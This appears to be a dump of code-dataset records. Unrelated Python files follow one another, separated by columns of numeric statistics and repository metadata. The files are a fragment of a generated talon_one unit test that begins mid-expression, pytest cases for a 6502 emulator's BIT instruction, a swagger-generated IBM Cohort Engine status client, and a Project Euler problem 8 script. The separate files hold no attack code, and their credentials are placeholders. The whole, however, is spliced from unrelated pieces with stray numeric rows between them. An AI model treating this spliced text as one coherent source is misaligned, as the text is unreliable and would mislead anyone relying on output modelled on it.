created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
coupon = '0',
referral = '0',
state = 'open',
cart_items = [
talon_one.models.cart_item.CartItem(
name = '0',
sku = '0',
quantity = 1,
price = 1.337,
category = '0',
weight = 1.337,
height = 1.337,
width = 1.337,
length = 1.337,
position = 1.337,
attributes = talon_one.models.item_attributes.ItemAttributes(), )  # class name assumed; the generator emitted a garbled identifier here
],
identifiers = [
'0'
],
total = 1.337,
attributes = talon_one.models.attributes.attributes(),
first_session = True,
discounts = {
'key' : 1.337
}, ),
profile = talon_one.models.customer_profile.CustomerProfile(
integration_id = '0',
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
attributes = talon_one.models.attributes.attributes(),
account_id = 56,
closed_sessions = 56,
total_sales = 1.337,
loyalty_memberships = [
talon_one.models.loyalty_membership.LoyaltyMembership(
joined = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
loyalty_program_id = 56, )
],
audience_memberships = [
talon_one.models.audience_membership.AudienceMembership(
id = 56,
name = '0', )
],
last_activity = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'), ),
event = talon_one.models.event.Event(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
type = '0',
attributes = talon_one.models.attributes.attributes(),
session_id = '0',
effects = [
None
],
ledger_entries = [
talon_one.models.ledger_entry.LedgerEntry(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
profile_id = '0',
account_id = 56,
loyalty_program_id = 56,
event_id = 56,
amount = 56,
reason = '0',
expiry_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
reference_id = 56, )
],
meta = talon_one.models.meta.Meta(
campaigns = talon_one.models.campaigns.campaigns(),
coupons = talon_one.models.coupons.coupons(),
coupon_rejection_reason = talon_one.models.coupon_rejection_reason.CouponRejectionReason(
campaign_id = 56,
coupon_id = 56,
reason = 'CouponNotFound', ),
referral_rejection_reason = talon_one.models.referral_rejection_reason.ReferralRejectionReason(
campaign_id = 56,
referral_id = 56,
reason = 'ReferralNotFound', ),
warnings = talon_one.models.warnings.warnings(), ), ),
)
def testIntegrationState(self):
"""Test IntegrationState"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 51.206897
| 647
| 0.438459
| 1,184
| 13,365
| 4.782095
| 0.178209
| 0.067821
| 0.10385
| 0.084069
| 0.749912
| 0.728365
| 0.709643
| 0.702932
| 0.702932
| 0.702932
| 0
| 0.073945
| 0.464721
| 13,365
| 260
| 648
| 51.403846
| 0.717501
| 0.007407
| 0
| 0.818966
| 0
| 0
| 0.068689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.008621
| 0.030172
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
481ea07cd917f474a27381b5979b9b17f52dae20
| 11,050
|
py
|
Python
|
tests/cpu/instruction/test_bitey_cpu_instruction_bit.py
|
jgerrish/bitey
|
a393a83c19338d94116f3405f4b8a0f03ea84d79
|
[
"MIT"
] | null | null | null |
tests/cpu/instruction/test_bitey_cpu_instruction_bit.py
|
jgerrish/bitey
|
a393a83c19338d94116f3405f4b8a0f03ea84d79
|
[
"MIT"
] | null | null | null |
tests/cpu/instruction/test_bitey_cpu_instruction_bit.py
|
jgerrish/bitey
|
a393a83c19338d94116f3405f4b8a0f03ea84d79
|
[
"MIT"
] | null | null | null |
import pytest
import tests.computer.computer
import tests.memory.memory
# TODO Maybe refactor so these are not needed
from bitey.cpu.addressing_mode import AbsoluteAddressingMode, ZeroPageAddressingMode
from bitey.cpu.instruction.opcode import Opcode
from bitey.cpu.instruction.bit import BIT
# module scope means run once per test module
@pytest.fixture(scope="module")
def setup():
computer = tests.computer.computer.init_computer()
yield computer
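# Background for the flag assertions below (6502 BIT semantics): Z is set when
# A & M == 0, while N and V copy bits 7 and 6 of the memory operand M,
# regardless of A. Worked example from the first test: A=0x21, M=0x3C gives
# A & M = 0x20 (nonzero, so Z=False), and 0x3C = 0b00111100 has bits 7 and 6
# clear (so N=False and V=False); i1.result holds the 0x20 conjunction.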
def test_cpu_instruction_bit_zeropage(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x21)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x3C)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", False)], []
)
assert i1.result == 0x20
def test_cpu_instruction_bit_zeropage_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x61)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x9D)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", True)], []
)
assert i1.result == 0x01
def test_cpu_instruction_bit_zeropage_overflow_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x9D)
    # The zero page location to read the value from
    computer.memory.write(0x00, 0x01)
    # The value
    computer.memory.write(0x01, 0x61)
    i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", False)], []
    )
    assert i1.result == 0x01


def test_cpu_instruction_bit_zeropage_overflow_and_negative_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x9D)
    # The zero page location to read the value from
    computer.memory.write(0x00, 0x01)
    # The value
    computer.memory.write(0x01, 0xE1)
    i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", True)], []
    )
    assert i1.result == 0x81


def test_cpu_instruction_bit_zeropage_zero_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x1C)
    # The zero page location to read the value from
    computer.memory.write(0x00, 0x01)
    # The value
    computer.memory.write(0x01, 0x21)
    i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", False)], []
    )
    assert i1.result == 0x00


def test_cpu_instruction_bit_zeropage_zero_and_negative_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x61)
    # The zero page location to read the value from
    computer.memory.write(0x00, 0x01)
    # The value
    computer.memory.write(0x01, 0x9C)
    i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", True)], []
    )
    assert i1.result == 0x00


def test_cpu_instruction_bit_zeropage_zero_and_overflow_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x9C)
    # The zero page location to read the value from
    computer.memory.write(0x00, 0x01)
    # The value
    computer.memory.write(0x01, 0x61)
    i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", False)], []
    )
    assert i1.result == 0x00


def test_cpu_instruction_bit_zeropage_zero_and_overflow_and_negative_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x1C)
    # The zero page location to read the value from
    computer.memory.write(0x00, 0x01)
    # The value
    computer.memory.write(0x01, 0xE1)
    i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", True)], []
    )
    assert i1.result == 0x00


def test_cpu_instruction_bit_absolute(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x21)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0x3C)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", False)], []
    )
    assert i1.result == 0x20


def test_cpu_instruction_bit_absolute_negative_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x61)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0x9D)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", True)], []
    )
    assert i1.result == 0x01


def test_cpu_instruction_bit_absolute_overflow_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x9D)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0x61)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", False)], []
    )
    assert i1.result == 0x01


def test_cpu_instruction_bit_absolute_overflow_and_negative_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x9D)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0xE1)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", True)], []
    )
    assert i1.result == 0x81


def test_cpu_instruction_bit_absolute_zero_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x1C)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0x21)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", False)], []
    )
    assert i1.result == 0x00


def test_cpu_instruction_bit_absolute_zero_and_negative_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x61)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0x9C)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", True)], []
    )
    assert i1.result == 0x00


def test_cpu_instruction_bit_absolute_zero_and_overflow_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x9C)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0x61)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", False)], []
    )
    assert i1.result == 0x00


def test_cpu_instruction_bit_absolute_zero_and_overflow_and_negative_flag(setup):
    computer = setup
    computer.reset()
    computer.cpu.registers["PC"].set(0x00)
    computer.cpu.registers["A"].set(0x1C)
    # The memory location to read the value from
    computer.memory.write(0x00, 0x02)
    computer.memory.write(0x01, 0x00)
    # The value
    computer.memory.write(0x02, 0xE1)
    i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
    i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
    tests.computer.computer.execute_explicit_instruction(
        computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", True)], []
    )
    assert i1.result == 0x00
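

# The tests above all assert the same rule: BIT computes A AND M without
# storing the result, sets Z when that result is zero, and copies bits 6 and 7
# of the memory operand into V and N. A minimal standalone sketch of that rule
# (plain Python, independent of the emulator classes exercised above):
def bit_flags(a, m):
    result = a & m
    return {
        "Z": result == 0,
        "V": bool(m & 0x40),  # bit 6 of the memory operand
        "N": bool(m & 0x80),  # bit 7 of the memory operand
    }


# Mirrors test_cpu_instruction_bit_zeropage_zero_and_overflow_and_negative_flag:
assert bit_flags(0x1C, 0xE1) == {"Z": True, "V": True, "N": True}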
| 28.851175 | 84 | 0.678733 | 1,422 | 11,050 | 5.137834 | 0.057665 | 0.05256 | 0.104024 | 0.04599 | 0.944703 | 0.944703 | 0.938133 | 0.935943 | 0.935943 | 0.935943 | 0 | 0.055685 | 0.187421 | 11,050 | 382 | 85 | 28.926702 | 0.757991 | 0.086787 | 0 | 0.778761 | 0 | 0 | 0.072196 | 0 | 0 | 0 | 0.057279 | 0.002618 | 0.070796 | 1 | 0.075221 | false | 0 | 0.026549 | 0 | 0.10177 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
483564b423122878993a9d78643a928c93edb783 | 15,415 | py | Python | tests/src/main/python/rest/tests/extract/swagger_client/api/status_api.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | ["Apache-2.0"] | 1 | 2020-10-05T15:10:03.000Z | 2020-10-05T15:10:03.000Z | tests/src/main/python/rest/tests/extract/swagger_client/api/status_api.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | ["Apache-2.0"] | null | null | null | tests/src/main/python/rest/tests/extract/swagger_client/api/status_api.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | ["Apache-2.0"] | null | null | null |
# coding: utf-8

"""
IBM Cohort Engine

Service to evaluate cohorts and measures # noqa: E501

OpenAPI spec version: 2.1.0 2022-02-18T21:50:45Z
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

from __future__ import absolute_import

import re # noqa: F401

# python 2 and python 3 compatibility library
import six

from swagger_client.api_client import ApiClient


class StatusApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def get_health_check_status(self, **kwargs): # noqa: E501
        """Determine if service is running correctly # noqa: E501

        This resource differs from /status in that it will always return a 500 error if the service state is not OK. This makes it simpler for service front ends (such as Datapower) to detect a failed service. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_health_check_status(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str format: Override response format
        :return: ServiceStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_health_check_status_with_http_info(**kwargs) # noqa: E501
        else:
            (data) = self.get_health_check_status_with_http_info(**kwargs) # noqa: E501
            return data

    def get_health_check_status_with_http_info(self, **kwargs): # noqa: E501
        """Determine if service is running correctly # noqa: E501

        This resource differs from /status in that it will always return a 500 error if the service state is not OK. This makes it simpler for service front ends (such as Datapower) to detect a failed service. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_health_check_status_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str format: Override response format
        :return: ServiceStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['format'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_health_check_status" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'format' in params:
            query_params.append(('format', params['format'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/xml']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/v1/status/health_check', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ServiceStatus', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_service_status(self, **kwargs): # noqa: E501
        """Get status of service # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_service_status(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str format: Override response format
        :param str liveness_check: Perform a shallow liveness check
        :return: ServiceStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_service_status_with_http_info(**kwargs) # noqa: E501
        else:
            (data) = self.get_service_status_with_http_info(**kwargs) # noqa: E501
            return data

    def get_service_status_with_http_info(self, **kwargs): # noqa: E501
        """Get status of service # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_service_status_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str format: Override response format
        :param str liveness_check: Perform a shallow liveness check
        :return: ServiceStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['format', 'liveness_check'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_service_status" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'format' in params:
            query_params.append(('format', params['format'])) # noqa: E501
        if 'liveness_check' in params:
            query_params.append(('liveness_check', params['liveness_check'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/xml']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/v1/status', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ServiceStatus', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def health_check_enhanced(self, version, fhir_server_connection_config, **kwargs): # noqa: E501
        """Get the status of the cohorting service and dependent downstream services # noqa: E501

        Checks the status of the cohorting service and any downstream services used by the cohorting service # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.health_check_enhanced(version, fhir_server_connection_config, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str version: The release date of the version of the API you want to use. Specify dates in YYYY-MM-DD format. (required)
        :param file fhir_server_connection_config: A configuration file containing information needed to connect to the FHIR server. See https://github.com/Alvearie/quality-measure-and-cohort-service/blob/main/docs/user-guide/fhir-server-config.md for more details. <p>Example Contents: <pre>{ \"dataServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" }, \"terminologyServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" } }</pre></p> (required)
        :return: EnhancedHealthCheckResults
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.health_check_enhanced_with_http_info(version, fhir_server_connection_config, **kwargs) # noqa: E501
        else:
            (data) = self.health_check_enhanced_with_http_info(version, fhir_server_connection_config, **kwargs) # noqa: E501
            return data

    def health_check_enhanced_with_http_info(self, version, fhir_server_connection_config, **kwargs): # noqa: E501
        """Get the status of the cohorting service and dependent downstream services # noqa: E501

        Checks the status of the cohorting service and any downstream services used by the cohorting service # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.health_check_enhanced_with_http_info(version, fhir_server_connection_config, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str version: The release date of the version of the API you want to use. Specify dates in YYYY-MM-DD format. (required)
        :param file fhir_server_connection_config: A configuration file containing information needed to connect to the FHIR server. See https://github.com/Alvearie/quality-measure-and-cohort-service/blob/main/docs/user-guide/fhir-server-config.md for more details. <p>Example Contents: <pre>{ \"dataServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" }, \"terminologyServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" } }</pre></p> (required)
        :return: EnhancedHealthCheckResults
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['version', 'fhir_server_connection_config'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method health_check_enhanced" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'version' is set
        if self.api_client.client_side_validation and ('version' not in params or
                                                       params['version'] is None): # noqa: E501
            raise ValueError("Missing the required parameter `version` when calling `health_check_enhanced`") # noqa: E501
        # verify the required parameter 'fhir_server_connection_config' is set
        if self.api_client.client_side_validation and ('fhir_server_connection_config' not in params or
                                                       params['fhir_server_connection_config'] is None): # noqa: E501
            raise ValueError("Missing the required parameter `fhir_server_connection_config` when calling `health_check_enhanced`") # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'version' in params:
            query_params.append(('version', params['version'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}
        if 'fhir_server_connection_config' in params:
            local_var_files['fhir_server_connection_config'] = params['fhir_server_connection_config'] # noqa: E501

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['multipart/form-data']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/v1/status/health_check_enhanced', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EnhancedHealthCheckResults', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
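

# Usage sketch for the generated client above, based only on the signatures and
# docstrings in this file. Connection details are omitted: the default
# ApiClient() constructed in __init__ is assumed to point at a reachable host.
if __name__ == "__main__":
    api = StatusApi()
    status = api.get_service_status()  # synchronous by default, returns ServiceStatus
    thread = api.get_service_status(async_req=True)  # asynchronous, returns the request thread
    print(status, thread.get())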
| 46.996951 | 1,021 | 0.621018 | 1,755 | 15,415 | 5.225071 | 0.136182 | 0.041876 | 0.034896 | 0.045365 | 0.903926 | 0.884188 | 0.87121 | 0.83795 | 0.834024 | 0.829335 | 0 | 0.015896 | 0.281739 | 15,415 | 327 | 1,022 | 47.140673 | 0.812319 | 0.439377 | 0 | 0.708333 | 1 | 0 | 0.187325 | 0.073196 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.02381 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
484bc65665590cbcb25bd216883d1a064a95570d | 1,272 | py | Python | 8.py | gricey432/Euler | 3bbdfc5dfe58df9a5b0217980d8951f00f53beed | ["MIT"] | null | null | null | 8.py | gricey432/Euler | 3bbdfc5dfe58df9a5b0217980d8951f00f53beed | ["MIT"] | null | null | null | 8.py | gricey432/Euler | 3bbdfc5dfe58df9a5b0217980d8951f00f53beed | ["MIT"] | null | null | null |
import operator
from functools import reduce  # reduce is no longer a builtin in Python 3


def str_product(iterable):
    # Multiply together the digit characters of a string
    nums = [int(c) for c in iterable]
    return reduce(operator.mul, nums, 1)
numbers = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
# All 13-digit windows of the 1000-digit number (Project Euler problem 8)
combos = [numbers[a:a+13] for a in range(len(numbers) - 12)]
products = [str_product(combo) for combo in combos]
print(max(products))
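# Equivalent check with math.prod (Python 3.8+), an alternative sketch of the
# same sliding-window computation:
import math
assert max(math.prod(map(int, numbers[a:a+13])) for a in range(len(numbers) - 12)) == max(products)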
